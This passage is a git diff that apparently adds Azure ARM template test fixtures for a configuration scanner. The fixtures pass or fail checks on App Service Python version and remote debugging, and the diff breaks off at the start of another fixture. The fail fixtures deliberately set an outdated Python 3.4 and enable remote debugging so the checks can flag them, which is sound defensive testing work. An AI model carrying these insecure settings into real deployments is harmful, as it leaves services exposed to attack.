b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json new file mode 100644 index 00000000000..4b3064a7f0b --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/fail.json @@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "fail", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." + }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "fail", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "3.4", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json new file mode 100644 index 00000000000..15f4d5e5a36 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/pass.json @@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." + }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "pass", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "3.10", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json new file mode 100644 index 00000000000..7e664c561be --- /dev/null +++ b/tests/arm/checks/resource/example_AppServicePythonVersion/unknown.json @@ -0,0 +1,381 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "fail", + "version": "0.25.53.49325", + "templateHash": "16144177164140676603" + } + }, + "parameters": { + "webAppName": { + "type": "string", + "defaultValue": "[format('webApp-{0}', uniqueString(resourceGroup().id))]", + "minLength": 2, + "metadata": { + "description": "Web app name." + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + }, + "sku": { + "type": "string", + "defaultValue": "F1", + "metadata": { + "description": "The SKU of App Service Plan." + } + }, + "language": { + "type": "string", + "defaultValue": ".net", + "allowedValues": [ + ".net", + "php", + "node", + "html" + ], + "metadata": { + "description": "The language stack of the app." + } + }, + "helloWorld": { + "type": "bool", + "defaultValue": false, + "metadata": { + "description": "true = deploy a sample Hello World app." + } + }, + "repoUrl": { + "type": "string", + "defaultValue": "", + "metadata": { + "description": "Optional Git Repo URL" + } + } + }, + "variables": { + "appServicePlanPortalName": "[format('AppServicePlan-{0}', parameters('webAppName'))]", + "gitRepoReference": { + ".net": "https://github.com/Azure-Samples/app-service-web-dotnet-get-started", + "node": "https://github.com/Azure-Samples/nodejs-docs-hello-world", + "php": "https://github.com/Azure-Samples/php-docs-hello-world", + "html": "https://github.com/Azure-Samples/html-docs-hello-world" + }, + "gitRepoUrl": "[if(bool(parameters('helloWorld')), variables('gitRepoReference')[toLower(parameters('language'))], parameters('repoUrl'))]", + "configReference": { + ".net": { + "comments": ".Net app. No additional configuration needed." + }, + "html": { + "comments": "HTML app. No additional configuration needed." + }, + "php": { + "phpVersion": "7.4" + }, + "node": { + "appSettings": [ + { + "name": "WEBSITE_NODE_DEFAULT_VERSION", + "value": "12.15.0" + } + ] + } + } + }, + "resources": [ + { + "type": "Microsoft.Web/sites", + "apiVersion": "2022-09-01", + "name": "unknown", + "location": "string", + "tags": { + "tagName1": "tagValue1", + "tagName2": "tagValue2" + }, + "kind": "string", + "extendedLocation": { + "name": "string" + }, + "identity": { + "type": "string", + "userAssignedIdentities": {} + }, + "properties": { + "clientAffinityEnabled": "bool", + "clientCertEnabled": "bool", + "clientCertExclusionPaths": "string", + "clientCertMode": "string", + "cloningInfo": { + "appSettingsOverrides": {}, + "cloneCustomHostNames": "bool", + "cloneSourceControl": "bool", + "configureLoadBalancing": "bool", + "correlationId": "string", + "hostingEnvironment": "string", + "overwrite": "bool", + "sourceWebAppId": "string", + "sourceWebAppLocation": "string", + "trafficManagerProfileId": "string", + "trafficManagerProfileName": "string" + }, + "containerSize": "int", + "customDomainVerificationId": "string", + "dailyMemoryTimeQuota": "int", + "enabled": "bool", + "hostingEnvironmentProfile": { + "id": "string" + }, + "hostNamesDisabled": "bool", + "hostNameSslStates": [ + { + "hostType": "string", + "name": "string", + "sslState": "string", + "thumbprint": "string", + "toUpdate": "bool", + "virtualIP": "string" + } + ], + "httpsOnly": "bool", + "hyperV": "bool", + "isXenon": "bool", + "keyVaultReferenceIdentity": "string", + "managedEnvironmentId": "string", + "publicNetworkAccess": "string", + "redundancyMode": "string", + "reserved": "bool", + "scmSiteAlsoStopped": "bool", + "serverFarmId": "string", + "siteConfig": { + "acrUseManagedIdentityCreds": "bool", + "acrUserManagedIdentityID": "string", + "alwaysOn": "bool", + "apiDefinition": { + "url": "string" + }, + "apiManagementConfig": { + "id": "string" + }, + "appCommandLine": "string", + "appSettings": [ + { + "name": "string", + "value": "string" + } + ], + "autoHealEnabled": "bool", + "autoHealRules": { + "actions": { + "actionType": "string", + "customAction": { + "exe": "string", + "parameters": "string" + }, + "minProcessExecutionTime": "string" + }, + "triggers": { + "privateBytesInKB": "int", + "requests": { + "count": "int", + "timeInterval": "string" + }, + "slowRequests": { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + }, + "slowRequestsWithPath": [ + { + "count": "int", + "path": "string", + "timeInterval": "string", + "timeTaken": "string" + } + ], + "statusCodes": [ + { + "count": "int", + "path": "string", + "status": "int", + "subStatus": "int", + "timeInterval": "string", + "win32Status": "int" + } + ], + "statusCodesRange": [ + { + "count": "int", + "path": "string", + "statusCodes": "string", + "timeInterval": "string" + } + ] + } + }, + "autoSwapSlotName": "string", + "azureStorageAccounts": {}, + "connectionStrings": [ + { + "connectionString": "string", + "name": "string", + "type": "string" + } + ], + "cors": { + "allowedOrigins": [ + "string" + ], + "supportCredentials": "bool" + }, + "defaultDocuments": [ + "string" + ], + "detailedErrorLoggingEnabled": "bool", + "documentRoot": "string", + "elasticWebAppScaleLimit": "int", + "experiments": { + "rampUpRules": [ + { + "actionHostName": "string", + "changeDecisionCallbackUrl": "string", + "changeIntervalInMinutes": "int", + "changeStep": "int", + "maxReroutePercentage": "int", + "minReroutePercentage": "int", + "name": "string", + "reroutePercentage": "int" + } + ] + }, + "ftpsState": "string", + "functionAppScaleLimit": "int", + "functionsRuntimeScaleMonitoringEnabled": "bool", + "handlerMappings": [ + { + "arguments": "string", + "extension": "string", + "scriptProcessor": "string" + } + ], + "healthCheckPath": "string", + "http20Enabled": "bool", + "httpLoggingEnabled": "bool", + "ipSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "ipSecurityRestrictionsDefaultAction": "string", + "javaContainer": "string", + "javaContainerVersion": "string", + "javaVersion": "string", + "keyVaultReferenceIdentity": "string", + "limits": { + "maxDiskSizeInMb": "int", + "maxMemoryInMb": "int", + "maxPercentageCpu": "int" + }, + "linuxFxVersion": "string", + "loadBalancing": "string", + "localMySqlEnabled": "bool", + "logsDirectorySizeLimit": "int", + "managedPipelineMode": "string", + "managedServiceIdentityId": "int", + "metadata": [ + { + "name": "string", + "value": "string" + } + ], + "minimumElasticInstanceCount": "int", + "minTlsVersion": "string", + "netFrameworkVersion": "string", + "nodeVersion": "string", + "numberOfWorkers": "int", + "phpVersion": "string", + "powerShellVersion": "string", + "preWarmedInstanceCount": "int", + "publicNetworkAccess": "string", + "publishingUsername": "string", + "push": { + "kind": "string", + "properties": { + "dynamicTagsJson": "string", + "isPushEnabled": "bool", + "tagsRequiringAuth": "string", + "tagWhitelistJson": "string" + } + }, + "pythonVersion": "unknown", + "remoteDebuggingEnabled": "bool", + "remoteDebuggingVersion": "string", + "requestTracingEnabled": "bool", + "requestTracingExpirationTime": "string", + "scmIpSecurityRestrictions": [ + { + "action": "string", + "description": "string", + "headers": {}, + "ipAddress": "string", + "name": "string", + "priority": "int", + "subnetMask": "string", + "subnetTrafficTag": "int", + "tag": "string", + "vnetSubnetResourceId": "string", + "vnetTrafficTag": "int" + } + ], + "scmIpSecurityRestrictionsDefaultAction": "string", + "scmIpSecurityRestrictionsUseMain": "bool", + "scmMinTlsVersion": "string", + "scmType": "string", + "tracingOptions": "string", + "use32BitWorkerProcess": "bool", + "virtualApplications": [ + { + "physicalPath": "string", + "preloadEnabled": "bool", + "virtualDirectories": [ + { + "physicalPath": "string", + "virtualPath": "string" + } + ], + "virtualPath": "string" + } + ], + "vnetName": "string", + "vnetPrivatePortsCount": "int", + "vnetRouteAllEnabled": "bool", + "websiteTimeZone": "string", + "webSocketsEnabled": "bool", + "windowsFxVersion": "string", + "xManagedServiceIdentityId": "int" + }, + "storageAccountRequired": "bool", + "virtualNetworkSubnetId": "string", + "vnetContentShareEnabled": "bool", + "vnetImagePullEnabled": "bool", + "vnetRouteAllEnabled": "bool" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json new file mode 100644 index 00000000000..26100716400 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/fail.json @@ -0,0 +1,77 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue" : "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku":{ + "type": "string", + "defaultValue" : "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion" : { + "type": "string", + "defaultValue" : "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/serverfarms", + "apiVersion": "2018-02-01", + "name": "[variables('appServicePlanName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "linux", + "properties":{ + "reserved":true + } + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2018-11-01", + "name": "fail", + "location": "[parameters('location')]", + "kind": "app,linux", + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]" + ], + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "reserved": true, + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "http20Enabled": "true", + "minTlsVersion": "1.2", + "remoteDebuggingEnabled": true + }, + "clientCertEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json new file mode 100644 index 00000000000..5e2c3318c72 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass.json @@ -0,0 +1,77 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue" : "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku":{ + "type": "string", + "defaultValue" : "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion" : { + "type": "string", + "defaultValue" : "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/serverfarms", + "apiVersion": "2018-02-01", + "name": "[variables('appServicePlanName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "linux", + "properties":{ + "reserved":true + } + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2018-11-01", + "name": "pass", + "location": "[parameters('location')]", + "kind": "app,linux", + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]" + ], + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "reserved": true, + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "http20Enabled": "true", + "minTlsVersion": "1.2", + "remoteDebuggingEnabled": false + }, + "clientCertEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json new file mode 100644 index 00000000000..f36cba465a0 --- /dev/null +++ b/tests/arm/checks/resource/example_AppServiceRemoteDebuggingNotEnabled/pass1.json @@ -0,0 +1,76 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "webAppName": { + "type": "string", + "defaultValue" : "AzureLinuxApp", + "metadata": { + "description": "Base name of the resource such as web app name and app service plan " + }, + "minLength": 2 + }, + "sku":{ + "type": "string", + "defaultValue" : "S1", + "metadata": { + "description": "The SKU of App Service Plan " + } + }, + "linuxFxVersion" : { + "type": "string", + "defaultValue" : "php|7.0", + "metadata": { + "description": "The Runtime stack of current web app" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "appServicePlanName": "[concat('AppServicePlan-', parameters('webAppName'))]" + }, + "resources": [ + { + "type": "Microsoft.Web/serverfarms", + "apiVersion": "2018-02-01", + "name": "[variables('appServicePlanName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('sku')]" + }, + "kind": "linux", + "properties":{ + "reserved":true + } + }, + { + "type": "Microsoft.Web/sites", + "apiVersion": "2018-11-01", + "name": "pass1", + "location": "[parameters('location')]", + "kind": "app,linux", + "dependsOn": [ + "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]" + ], + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "reserved": true, + "serverFarmId": "[resourceId('Microsoft.Web/serverfarms', variables('appServicePlanName'))]", + "siteConfig": { + "linuxFxVersion": "[parameters('linuxFxVersion')]", + "http20Enabled": "true", + "minTlsVersion": "1.2" + }, + "clientCertEnabled": true + } + } + ] +} diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json new file mode 100644 index 00000000000..51f1623379f --- /dev/null +++ 